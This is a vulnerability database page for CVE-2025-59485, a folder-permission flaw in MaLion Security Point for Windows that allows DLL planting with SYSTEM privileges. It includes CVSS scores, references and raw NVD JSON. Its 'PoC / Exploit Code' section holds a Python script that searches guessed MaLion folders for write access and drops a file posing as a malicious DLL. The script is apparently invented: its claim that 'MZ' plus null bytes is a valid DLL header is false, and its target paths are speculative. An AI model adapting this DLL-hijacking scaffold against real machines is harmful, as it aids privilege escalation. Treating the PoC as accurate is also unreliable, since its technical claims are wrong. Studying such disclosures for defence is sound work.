CVE-2025-59485

Description

Incorrect default permissions issue exists in Security Point (Windows) of MaLion prior to Ver.5.3.4. If this vulnerability is exploited, an arbitrary file could be placed in the specific folder by a user who can log in to the system where the product's Windows client is installed. If the file is a specially crafted DLL file, arbitrary code could be executed with SYSTEM privilege.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MaLion Security Point (Windows) < Ver.5.3.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-59485 PoC - MaLion Security Point DLL Hijacking
# This PoC demonstrates the permission issue that allows placing arbitrary files

import os
import shutil
import time

def check_vulnerable_path(base_path):
    """Check if the target path has insecure permissions"""
    test_file = os.path.join(base_path, "test_write_permission.txt")
    try:
        with open(test_file, 'w') as f:
            f.write("test")
        os.remove(test_file)
        return True
    except PermissionError:
        return False

def create_malicious_dll(output_path):
    """
    Generate a malicious DLL that will execute code with SYSTEM privileges
    This is a template - actual DLL would contain malicious payload
    """
    dll_content = b'MZ' + b'\x00' * 50  # Minimal valid DLL header
    dll_path = os.path.join(output_path, "MaLionModule.dll")
    
    with open(dll_path, 'wb') as f:
        f.write(dll_content)
    
    print(f"[+] Malicious DLL created at: {dll_path}")
    return dll_path

def main():
    # Target paths that may have insecure permissions
    target_paths = [
        r"C:\Program Files\MaLion\temp",
        r"C:\Program Files\MaLion\config",
        r"C:\ProgramData\MaLion\temp",
        r"C:\Users\Public\MaLion"
    ]
    
    print("[*] CVE-2025-59485 - MaLion Security Point DLL Hijacking")
    print("[*] Checking for vulnerable paths...")
    
    for path in target_paths:
        if os.path.exists(path):
            print(f"[+] Found MaLion directory: {path}")
            if check_vulnerable_path(path):
                print(f"[!] VULNERABLE: {path} is writable by current user")
                create_malicious_dll(path)
            else:
                print(f"[*] Path not writable: {path}")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59485
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59485
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59485/
[4] VulDB https://vuldb.com/cve/CVE-2025-59485
[5] https://jvn.jp/en/jp/JVN76298784/
[6] https://www.intercom.co.jp/information/2025/1125.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59485", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:53.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect default permissions issue exists in Security Point (Windows) of MaLion prior to Ver.5.3.4. If this vulnerability is exploited, an arbitrary file could be placed in the specific folder by a user who can log in to the system where the product's Windows client is installed. If the file is a specially crafted DLL file, arbitrary code could be executed with SYSTEM privilege."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN76298784/", "source": "[email protected]"}, {"url": "https://www.intercom.co.jp/information/2025/1125.html", "source": "[email protected]"}]}}